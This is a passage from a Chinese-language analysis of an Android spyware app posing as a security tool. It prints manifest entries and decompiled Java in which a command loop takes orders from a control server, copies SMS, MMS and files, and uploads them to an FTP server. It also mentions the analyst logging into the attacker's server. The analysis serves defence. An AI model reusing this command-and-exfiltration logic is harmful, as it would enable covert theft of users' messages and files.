<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.AUDIO_BECOMING_NOISY" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.SCO_AUDIO_STATE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.media.action.CLOSE_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.media.action.OPEN_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.SMS_REJECTED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.speech.tts.TTS_QUEUE_PROCESSING_COMPLETED" />
<action android:name="android.speech.tts.engine.TTS_DATA_INSTALLED" />
</intent-filter>
</receiver>
<receiver android:name=".AlarmReceiver" />
<service android:name=".UploadService">
<intent-filter>
<action android:name="UploadService" />
</intent-filter>
</service>
<activity android:theme="@*android:style/Theme.NoTitleBar" android:label="@string/swiftp_name" android:name=".ServerControlActivity" android:launchMode="singleInstance" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
可以看到.StartService广播接收器注册了大量的系统广报,这样可以保证程序的长期运行。通过配置文件可以看出,该程序只有 .StartService一个程序入口点。
2、分析程序代码
恶意代码树如下:
.StartService组件完成.UploadService服务启动,并调用HttpFileUploader.runInit方法,具体代码如下:
.UploadService服务注册定时器启动.AlarmReceiver广播接收器,并保存注册结果到文件。具体代码如下:
.AlarmReceiver和.StartService一样也会调用HttpFileUploader.runInit方法。具体代码如下:
现在所有的分析工作都应该聚焦在HttpFileUploader.runInit方法。在分析的过程中不再对具体的方法进行进一步展开分析。
public void runIt()
{
String str1 = getControls();//getControls()函数功能:连接服务器获取指令。指令格式为(第一行是命令行 第二行是需获取文件列表的路径名),函数返回值为命令,并保存路径名到this.path。
String str2 = str1 + ":" + fetchListing(this.path, "", 0) + ":" + this.path; //fetchListing()函数功能:递归遍历this.path路径,获取该路径所有文件信息。
if (str1.equals("clearFileList")) //如果命令为clearFileList,删除this.UPLOADFOLDER目录
if (!getContextValue("Data.dat").equals("clearFileList"))
delTempFolder(this.UPLOADFOLDER);
while (true)
{
tryUpload();//ftp登录服务器端,并上传this.UPLOADFOLDER目录下所有文件
return;
if (str1.equals("getDir"))//如果命令为getDir,保存目录文件列表信息到this.UPLOADFOLDER的FileList.txt文件
{
if (getContextValue("Data.dat").equals(str2))
continue;
try
{
String str7 = "FileList.txt" + this.path.replace('/', '_');
File localFile5 = new File(this.UPLOADFOLDER + str7);
if (!localFile5.exists())
{
BufferedWriter localBufferedWriter3 = new BufferedWriter(new FileWriter(localFile5));
localBufferedWriter3.write(str2);
localBufferedWriter3.close();
}
setContextValue("Data.dat", str2);
}
catch (Exception localException3)
{
}
}
if (str1.equals("clearAlarm"))//重新设定定时器
{
if (getContextValue("Data.dat").equals("clearAlarm"))
continue;
setContextValue("alarmIsSet.dat", new String("Reset"));
}
if (str1.equals("getTexts"))//获取所有短息,彩信信息,并保存到this.UPLOADFOLDER目录中
{
if (getContextValue("Data.dat").equals("GotTexts"))
continue;
getTextHistory();
setContextValue("Data.dat", "GotTexts");
}
if (str1.equals("getFile"))//copy相应文件到this.UPLOADFOLDER目录
{
if (getContextValue("Data.dat").equals("getFile" + this.path))
continue;
try
{
File localFile2 = new File(this.path);
File localFile3 = new File(this.UPLOADFOLDER + localFile2.getName());
if (!localFile3.exists())
{
copyToUploadFolder(localFile2);
String str5 = getSize(localFile3.getAbsolutePath());
String str6 = "SizeRet.txt" + this.path.replace('\\', '_');
File localFile4 = new File(this.UPLOADFOLDER + str6);
if (!localFile4.exists())
{
BufferedWriter localBufferedWriter2 = new BufferedWriter(new FileWriter(localFile4));
localBufferedWriter2.write(str5);
localBufferedWriter2.close();
}
}
setContextValue("Data.dat", "getFile" + this.path);
}
catch (Exception localException2)
{
}
}
if ((!str1.equals("getSize")) || (getContextValue("Data.dat").equals("getSize" + this.path)))//获取相应文件大小。保存信息到this.UPLOADFOLDER目录中
continue;
try
{
String str3 = getSize(this.path);
String str4 = "SizeRet.txt" + this.path.replace('\\', '_');
File localFile1 = new File(this.UPLOADFOLDER + str4);
if (!localFile1.exists());
BufferedWriter localBufferedWriter1 = new BufferedWriter(new FileWriter(localFile1));
localBufferedWriter1.write(str3);
localBufferedWriter1.close();
}
catch (Exception localException1)
{
}
}
}
通过分析,HttpFileUploader.runInit方法具体的工作就是连接服务器获取指令,然后把获取的信息以文件的形式存放到上传目录,并把上传目录的所有文件上传到ftp服务器
通过ftp客户端登录服务器,可以看到已有大量感染该病毒用户的隐私信息被上传。
通过访问该恶意站点,可以发现该站点还可以感染PC平台,它能够根据用户不同的操作系统下发不同的木马程序。攻击平台包括Windows, Mac and Unix/Linux。
四、相关链接
http://blog.trustgo.com/fakelookout/
http://www.cnbeta.com/articles/210425.htm